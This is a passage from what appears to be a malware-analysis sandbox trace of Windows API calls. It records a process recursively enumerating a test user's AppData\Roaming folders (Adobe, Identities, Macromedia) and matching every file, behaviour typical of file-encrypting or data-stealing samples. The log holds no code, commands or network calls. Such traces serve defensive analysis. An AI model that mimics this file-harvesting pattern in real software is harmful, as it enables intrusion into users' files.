(pszFile="9cIv.mp3", pszSpec="*") returned 1 [0083.404] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e268 | out: lpFindFileData=0x18e268) returned 1 [0083.404] PathMatchSpecW (pszFile="9rKKEdWHzAr2h.ppt", pszSpec="*") returned 1 [0083.404] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e268 | out: lpFindFileData=0x18e268) returned 1 [0083.404] PathMatchSpecW (pszFile="a3ZfsA3.bmp", pszSpec="*") returned 1 [0083.404] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e268 | out: lpFindFileData=0x18e268) returned 1 [0083.404] PathMatchSpecW (pszFile="a6-2v.swf", pszSpec="*") returned 1 [0083.404] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e268 | out: lpFindFileData=0x18e268) returned 1 [0083.404] PathCombineW (in: pszDest=0x18e4b8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming", pszFile="Adobe" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe" [0083.404] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\*" [0083.404] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\*", lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 0x586b60 [0083.404] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 1 [0083.404] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 1 [0083.404] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe", pszFile="Acrobat" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat" [0083.404] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\*" [0083.404] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.404] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.404] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.404] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat", pszFile="10.0" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0" [0083.404] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\*" [0083.404] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.404] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.404] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.404] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0", pszFile="Collab" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab" [0083.404] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab\\*" [0083.404] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab\\*", lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0x586c20 [0083.404] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 1 [0083.404] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0 [0083.405] FindClose (in: hFindFile=0x586c20 | out: hFindFile=0x586c20) returned 1 [0083.405] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.405] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0", pszFile="Forms" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms" [0083.405] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms\\*" [0083.405] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms\\*", lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0x586c20 [0083.405] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 1 [0083.405] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0 [0083.405] FindClose (in: hFindFile=0x586c20 | out: hFindFile=0x586c20) returned 1 [0083.405] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.405] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0", pszFile="JavaScripts" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts" [0083.405] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\*" [0083.405] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\*", lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0x586c20 [0083.405] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 1 [0083.405] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 1 [0083.405] PathMatchSpecW (pszFile="glob.js", pszSpec="*") returned 1 [0083.405] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 1 [0083.405] PathMatchSpecW (pszFile="glob.settings.js", pszSpec="*") returned 1 [0083.405] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0 [0083.405] FindClose (in: hFindFile=0x586c20 | out: hFindFile=0x586c20) returned 1 [0083.405] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.405] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0", pszFile="Security" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security" [0083.405] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\*" [0083.405] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\*", lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0x586c20 [0083.405] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 1 [0083.405] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 1 [0083.405] PathMatchSpecW (pszFile="addressbook.acrodata", pszSpec="*") returned 1 [0083.405] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 1 [0083.405] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security", pszFile="CRLCache" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache" [0083.405] PathCombineW (in: pszDest=0x18ce10, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\*" [0083.405] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\*", lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 0x586c60 [0083.405] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 1 [0083.405] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 1 [0083.405] PathMatchSpecW (pszFile="48B76449F3D5FEFA1133AA805E420F0FCA643651.crl", pszSpec="*") returned 1 [0083.406] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 1 [0083.406] PathMatchSpecW (pszFile="A9B8213768ADC68AF64FCC6409E8BE414726687F.crl", pszSpec="*") returned 1 [0083.406] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 0 [0083.406] FindClose (in: hFindFile=0x586c60 | out: hFindFile=0x586c60) returned 1 [0083.406] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0 [0083.406] FindClose (in: hFindFile=0x586c20 | out: hFindFile=0x586c20) returned 1 [0083.406] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0 [0083.406] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.406] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0 [0083.406] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.406] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 1 [0083.406] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe", pszFile="Flash Player" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player" [0083.406] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player\\*" [0083.406] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.406] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.406] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.406] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player", pszFile="AssetCache" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache" [0083.406] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\*" [0083.406] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.406] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.406] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0 [0083.406] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.406] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0 [0083.406] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.406] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 1 [0083.406] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe", pszFile="Headlights" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Headlights") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Headlights" [0083.406] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Headlights", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Headlights\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Headlights\\*" [0083.406] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Headlights\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.406] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.406] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0 [0083.406] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.407] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 1 [0083.407] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe", pszFile="Linguistics" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics" [0083.407] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics\\*" [0083.407] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.407] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.407] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.407] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics", pszFile="Dictionaries" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries" [0083.407] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries\\*" [0083.407] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.407] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.407] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0 [0083.407] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.407] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0 [0083.407] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.407] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 1 [0083.407] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe", pszFile="LogTransport2" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\LogTransport2") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\LogTransport2" [0083.407] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\LogTransport2", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\LogTransport2\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\LogTransport2\\*" [0083.407] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\LogTransport2\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.407] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.407] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0 [0083.407] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.407] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 0 [0083.407] FindClose (in: hFindFile=0x586b60 | out: hFindFile=0x586b60) returned 1 [0083.407] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e268 | out: lpFindFileData=0x18e268) returned 1 [0083.407] PathMatchSpecW (pszFile="BDa5B4GVrREPMxye24.gif", pszSpec="*") returned 1 [0083.407] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e268 | out: lpFindFileData=0x18e268) returned 1 [0083.407] PathMatchSpecW (pszFile="bGn 5cfhGh1UZr.wav", pszSpec="*") returned 1 [0083.407] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e268 | out: lpFindFileData=0x18e268) returned 1 [0083.407] PathMatchSpecW (pszFile="cL5q.m4a", pszSpec="*") returned 1 [0083.407] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e268 | out: lpFindFileData=0x18e268) returned 1 [0083.407] PathMatchSpecW (pszFile="Cq3qmzP.mp4", pszSpec="*") returned 1 [0083.407] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e268 | out: lpFindFileData=0x18e268) returned 1 [0083.407] PathMatchSpecW (pszFile="fVg-V.m4a", pszSpec="*") returned 1 [0083.407] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e268 | out: lpFindFileData=0x18e268) returned 1 [0083.408] PathMatchSpecW (pszFile="fyH-uEyk.gif", pszSpec="*") returned 1 [0083.408] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e268 | out: lpFindFileData=0x18e268) returned 1 [0083.408] PathMatchSpecW (pszFile="gXiF8Ie492m0IXBb.gif", pszSpec="*") returned 1 [0083.408] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e268 | out: lpFindFileData=0x18e268) returned 1 [0083.408] PathMatchSpecW (pszFile="h4yUoS3CBTrCBZSc.mp4", pszSpec="*") returned 1 [0083.408] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e268 | out: lpFindFileData=0x18e268) returned 1 [0083.408] PathCombineW (in: pszDest=0x18e4b8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming", pszFile="Identities" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities" [0083.408] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities\\*" [0083.408] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities\\*", lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 0x586b60 [0083.408] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 1 [0083.408] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 1 [0083.408] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities", pszFile="{31810C36-5D23-4CCE-A3B4-316DED195C38}" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}" [0083.408] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\*" [0083.408] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.408] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.408] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0 [0083.408] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.408] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 0 [0083.408] FindClose (in: hFindFile=0x586b60 | out: hFindFile=0x586b60) returned 1 [0083.408] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e268 | out: lpFindFileData=0x18e268) returned 1 [0083.408] PathMatchSpecW (pszFile="iuoldw.exe", pszSpec="*") returned 1 [0083.408] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e268 | out: lpFindFileData=0x18e268) returned 1 [0083.408] PathMatchSpecW (pszFile="jzyu_DZ Ndc.odt", pszSpec="*") returned 1 [0083.408] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e268 | out: lpFindFileData=0x18e268) returned 1 [0083.408] PathMatchSpecW (pszFile="KRCwaFRvShw3yRI.swf", pszSpec="*") returned 1 [0083.408] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e268 | out: lpFindFileData=0x18e268) returned 1 [0083.408] PathCombineW (in: pszDest=0x18e4b8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming", pszFile="Macromedia" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia" [0083.408] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\*" [0083.408] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\*", lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 0x586b60 [0083.408] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 1 [0083.408] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 1 [0083.408] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia", pszFile="Flash Player" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player" [0083.408] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\*" [0083.408] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.408] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.408] FindNextFileW (in: 